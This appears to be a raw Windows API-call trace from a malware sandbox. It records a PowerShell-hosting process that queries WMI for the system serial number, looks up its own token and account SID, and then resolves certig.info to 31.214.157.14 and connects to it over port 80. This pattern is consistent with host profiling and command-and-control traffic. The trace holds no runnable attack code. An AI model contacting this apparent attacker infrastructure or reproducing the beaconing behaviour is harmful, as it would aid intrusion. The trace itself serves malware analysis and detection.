	[0175.400] IWbemClassObject:Get (in: This=0x1c834830, wszName="SerialNumber", lFlags=0, pVal=0x1c80d3e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d3dc*=19, plFlavor=0x1c80d3d8*=0 | out: pVal=0x1c80d3e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c80d3dc*=19, plFlavor=0x1c80d3d8*=0) returned 0x0
	[0176.412] GetCurrentProcess () returned 0xffffffffffffffff
	[0176.412] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80d008 | out: TokenHandle=0x1c80d008*=0x498) returned 1
	[0176.559] GetCurrentProcess () returned 0xffffffffffffffff
	[0176.559] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80d268 | out: TokenHandle=0x1c80d268*=0x49c) returned 1
	[0176.560] GetTokenInformation (in: TokenHandle=0x498, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1c80d258 | out: TokenInformation=0x0, ReturnLength=0x1c80d258) returned 0
	[0176.560] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b813680
	[0176.560] GetTokenInformation (in: TokenHandle=0x498, TokenInformationClass=0x1, TokenInformation=0x1b813680, TokenInformationLength=0x2c, ReturnLength=0x1c80d258 | out: TokenInformation=0x1b813680, ReturnLength=0x1c80d258) returned 1
	[0176.563] LocalFree (hMem=0x1b813680) returned 0x0
	[0176.571] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x1c80d088, DesiredAccess=0x800, PolicyHandle=0x1c80d080 | out: PolicyHandle=0x1c80d080) returned 0x0
	[0176.572] LsaLookupSids (in: PolicyHandle=0x1b813680, Count=0x1, Sids=0x3140bd8*=0x3140b38*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x1c80d110, Names=0x1c80d108 | out: ReferencedDomains=0x1c80d110, Names=0x1c80d108) returned 0x0
	[0176.574] LsaClose (ObjectHandle=0x1b813680) returned 0x0
	[0176.574] LsaFreeMemory (Buffer=0x1b7ff470) returned 0x0
	[0176.574] LsaFreeMemory (Buffer=0x1b8111f0) returned 0x0
	[0176.843] send (s=0x404, buf=0x3144378*, len=121, flags=0) returned 121
	[0176.851] recv (in: s=0x404, buf=0x303db58, len=502, flags=0 | out: buf=0x303db58*) returned 502
	[0176.982] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0177.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c80d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c80d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c80d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c80d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.719] CoTaskMemAlloc (cb=0x104) returned 0x1b7a5360
	[0177.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a5360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0177.719] CoTaskMemFree (pv=0x1b7a5360) 
	[0177.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c80d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c80d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c80d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c80d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0181.277] CoTaskMemAlloc (cb=0x104) returned 0x1b7a5360
	[0181.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a5360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0181.277] CoTaskMemFree (pv=0x1b7a5360) 
	[0181.629] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4c8
	[0194.476] CloseHandle (hObject=0x4c8) returned 1
	[0194.552] shutdown (s=0x404, how=2) returned 0
	[0194.553] closesocket (s=0x404) returned 0
	[0194.849] CoTaskMemAlloc (cb=0xd) returned 0x1b81f630
	[0194.849] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c80d180*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c80d178 | out: ppResult=0x1c80d178*=0x1b801870*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b81f690*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0195.035] CoTaskMemFree (pv=0x1b81f630) 
	[0195.035] CoTaskMemFree (pv=0x0) 
	[0195.035] FreeAddrInfoW (pAddrInfo=0x1b801870*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b81f690*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0195.036] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x404
	[0195.036] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0195.036] WSAConnect (in: s=0x404, name=0x307f308*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0195.095] closesocket (s=0x4c8) returned 0
	[0195.397] recv (in: s=0x404, buf=0x3274530, len=502, flags=0 | out: buf=0x3274530*) returned 117
	[0195.548] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0195.777] CoGetObjectContext (in: riid=0x1c80cff8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cff0 | out: ppv=0x1c80cff0*=0x181868) returned 0x0
	[0195.778] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80d010 | out: pAptType=0x1c80d010*=1) returned 0x0
	[0195.778] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d118 | out: ppvObject=0x1c80d118*=0x0) returned 0x80004002
	[0195.778] IUnknown:Release (This=0x181868) returned 0x1
	[0195.780] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c680 | out: ppv=0x1c80c680*=0x1c8317e0) returned 0x0
	[0195.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8317e0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c390 | out: ppvObject=0x1c80c390*=0x0) returned 0x80004002
	[0195.794] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8317e0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c378 | out: ppvObject=0x1c80c378*=0x1c834510) returned 0x0
	[0195.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c834510, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c280 | out: ppvObject=0x1c80c280*=0x1c834510) returned 0x0
	[0195.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c834510, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c300 | out: ppvObject=0x1c80c300*=0x0) returned 0x80004002
	[0195.795] WbemDefPath:IUnknown:AddRef (This=0x1c834510) returned 0x3
	[0195.795] CoGetContextToken (in: pToken=0x1c80bf50 | out: pToken=0x1c80bf50) returned 0x0
	[0195.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c834510, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bf10 | out: ppvObject=0x1c80bf10*=0x1b81f670) returned 0x0
	[0195.795] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b81f670, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bf40 | out: pCid=0x1c80bf40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0195.795] WbemDefPath:IUnknown:Release (This=0x1b81f670) returned 0x3
	[0195.795] CoGetContextToken (in: pToken=0x1c80bf20 | out: pToken=0x1c80bf20) returned 0x0
	[0195.795] WbemDefPath:IUnknown:AddRef (This=0x1c834510) returned 0x4
	[0195.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c834510, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c038 | out: ppvObject=0x1c80c038*=0x0) returned 0x80004002
	[0195.796] WbemDefPath:IUnknown:Release (This=0x1c834510) returned 0x3
	[0195.796] WbemDefPath:IUnknown:Release (This=0x1c834510) returned 0x2
	[0195.796] WbemDefPath:IUnknown:Release (This=0x1c8317e0) returned 0x0
	[0195.796] WbemDefPath:IUnknown:Release (This=0x1c834510) returned 0x1
	[0195.796] CoGetContextToken (in: pToken=0x1c80cc50 | out: pToken=0x1c80cc50) returned 0x0
	[0195.796] CoGetContextToken (in: pToken=0x1c80cb90 | out: pToken=0x1c80cb90) returned 0x0
	[0195.796] WbemDefPath:IUnknown:AddRef (This=0x1c834510) returned 0x2
	[0195.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c834510, riid=0x1c80ccd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ccb0 | out: ppvObject=0x1c80ccb0*=0x1c834510) returned 0x0
	[0195.797] WbemDefPath:IUnknown:Release (This=0x1c834510) returned 0x2
	[0195.797] WbemDefPath:IUnknown:Release (This=0x1c834510) returned 0x1
	[0195.797] CoGetContextToken (in: pToken=0x1c80cdd0 | out: pToken=0x1c80cdd0) returned 0x0
	[0195.797] CoGetContextToken (in: pToken=0x1c80cd10 | out: pToken=0x1c80cd10) returned 0x0
	[0195.797] WbemDefPath:IUnknown:AddRef (This=0x1c834510) returned 0x2
	[0195.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c834510, riid=0x1c80ce50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ce30 | out: ppvObject=0x1c80ce30*=0x1c834510) returned 0x0
	[0195.798] WbemDefPath:IUnknown:Release (This=0x1c834510) returned 0x2
	[0195.798] WbemDefPath:IUnknown:AddRef (This=0x1c834510) returned 0x3
	[0195.798] WbemDefPath:IWbemPath:SetText (This=0x1c834510, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.798] WbemDefPath:IUnknown:Release (This=0x1c834510) returned 0x2
	[0195.798] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80d0e0 | out: puCount=0x1c80d0e0*=0x2) returned 0x0
	[0195.798] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d0e0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d0e0*=0x17, pszText=0x0) returned 0x0
	[0195.798] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d0e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d0e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.798] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80d090 | out: puCount=0x1c80d090*=0x2) returned 0x0
	[0195.798] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d090*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d090*=0x17, pszText=0x0) returned 0x0
	[0195.798] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80d090*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d090*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.798] CoGetObjectContext (in: riid=0x1c80cfc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfc0 | out: ppv=0x1c80cfc0*=0x181868) returned 0x0
	[0195.799] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfe0 | out: pAptType=0x1c80cfe0*=1) returned 0x0
	[0195.799] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0e8 | out: ppvObject=0x1c80d0e8*=0x0) returned 0x80004002
	[0195.799] IUnknown:Release (This=0x181868) returned 0x1
	[0195.799] CoGetClassObject (in: rclsid=0x1b8026f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cc70 | out: ppv=0x1c80cc70*=0x1c831880) returned 0x0
	[0195.799] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831880, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c980 | out: ppvObject=0x1c80c980*=0x0) returned 0x80004002
	[0195.799] WbemLocator:IClassFactory:CreateInstance (in: This=0x1c831880, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c968 | out: ppvObject=0x1c80c968*=0x1c8318a0) returned 0x0
	[0195.800] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8318a0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c870 | out: ppvObject=0x1c80c870*=0x1c8318a0) returned 0x0
	[0195.800] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8318a0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8f0 | out: ppvObject=0x1c80c8f0*=0x0) returned 0x80004002
	[0195.800] WbemLocator:IUnknown:AddRef (This=0x1c8318a0) returned 0x3
	[0195.800] CoGetContextToken (in: pToken=0x1c80c540 | out: pToken=0x1c80c540) returned 0x0
	[0195.801] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8318a0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c500 | out: ppvObject=0x1c80c500*=0x0) returned 0x80004002
	[0195.801] CoGetContextToken (in: pToken=0x1c80c510 | out: pToken=0x1c80c510) returned 0x0
	[0195.801] WbemLocator:IUnknown:AddRef (This=0x1c8318a0) returned 0x4
	[0195.801] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8318a0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c628 | out: ppvObject=0x1c80c628*=0x0) returned 0x80004002
	[0195.801] WbemLocator:IUnknown:Release (This=0x1c8318a0) returned 0x3
	[0195.801] WbemLocator:IUnknown:Release (This=0x1c8318a0) returned 0x2
	[0195.802] WbemLocator:IUnknown:Release (This=0x1c831880) returned 0x0
	[0195.802] WbemLocator:IUnknown:Release (This=0x1c8318a0) returned 0x1
	[0195.802] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0195.802] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0195.802] WbemLocator:IUnknown:AddRef (This=0x1c8318a0) returned 0x2
	[0195.802] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8318a0, riid=0x1c80cbb0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80cb90 | out: ppvObject=0x1c80cb90*=0x1c8318a0) returned 0x0
	[0195.802] WbemLocator:IUnknown:Release (This=0x1c8318a0) returned 0x2
	[0195.802] WbemLocator:IUnknown:Release (This=0x1c8318a0) returned 0x1
	[0195.803] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0195.803] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=8, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0195.803] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=8, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.803] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c80cc80 | out: ppv=0x1c80cc80*=0x1c8318c0) returned 0x0
	[0195.803] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c8318c0, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c80cf10 | out: ppNamespace=0x1c80cf10*=0x1c834808) returned 0x0
	[0195.981] WbemLocator:IUnknown:QueryInterface (in: This=0x1c834808, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80caf8 | out: ppvObject=0x1c80caf8*=0x1b8074f0) returned 0x0
	[0195.981] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b8074f0, pProxy=0x1c834808, pAuthnSvc=0x1c80caf0, pAuthzSvc=0x1c80caec, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8, pImpLevel=0x1c80cb04, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00 | out: pAuthnSvc=0x1c80caf0*=0xa, pAuthzSvc=0x1c80caec*=0x0, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8*=0x6, pImpLevel=0x1c80cb04*=0x2, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00*=0x1) returned 0x0
	[0195.981] WbemLocator:IUnknown:Release (This=0x1b8074f0) returned 0x1
	[0195.981] WbemLocator:IUnknown:QueryInterface (in: This=0x1c834808, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca98 | out: ppvObject=0x1c80ca98*=0x1b807530) returned 0x0
	[0195.981] WbemLocator:IUnknown:QueryInterface (in: This=0x1c834808, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca28 | out: ppvObject=0x1c80ca28*=0x1b8074f0) returned 0x0
	[0195.981] WbemLocator:IClientSecurity:SetBlanket (This=0x1b8074f0, pProxy=0x1c834808, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0195.982] WbemLocator:IUnknown:Release (This=0x1b8074f0) returned 0x2
	[0195.982] WbemLocator:IUnknown:Release (This=0x1b807530) returned 0x1
	[0195.982] CoTaskMemFree (pv=0x1b81e530) 
	[0195.982] WbemLocator:IUnknown:Release (This=0x1c8318c0) returned 0x0
	[0195.982] WbemLocator:IUnknown:QueryInterface (in: This=0x1c834808, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c710 | out: ppvObject=0x1c80c710*=0x1b807530) returned 0x0
	[0195.982] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807530, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c790 | out: ppvObject=0x1c80c790*=0x0) returned 0x80004002
	[0195.983] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807530, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c528 | out: ppvObject=0x1c80c528*=0x0) returned 0x80004002
	[0195.984] WbemLocator:IUnknown:AddRef (This=0x1b807530) returned 0x3
	[0195.984] CoGetContextToken (in: pToken=0x1c80c3e0 | out: pToken=0x1c80c3e0) returned 0x0
	[0195.984] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807530, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c3a0 | out: ppvObject=0x1c80c3a0*=0x1b807418) returned 0x0
